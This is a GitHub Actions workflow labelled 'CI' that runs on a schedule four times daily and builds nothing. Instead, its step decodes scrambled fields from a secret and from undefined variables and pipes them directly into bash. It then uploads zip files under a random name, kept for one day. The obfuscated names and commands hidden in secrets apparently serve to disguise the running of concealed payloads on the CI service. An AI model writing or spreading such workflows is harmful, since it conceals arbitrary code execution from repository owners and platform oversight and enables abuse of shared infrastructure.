name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '10 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          dizlq9: ${{ secrets.dizlq9 }}
        run: |
          printf '%s' "$dizlq9" | jq -r .hej37 | /bin/bash
          echo $sm0753 | jq -r .wtifq83 | /bin/bash
          echo $greaf01214 | jq -r .hvq7188 | /bin/bash
          echo $lbdft81 | jq -r .fpzn5 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 9iBqPdIw
          path: "*.zip"
          retention-days: 1
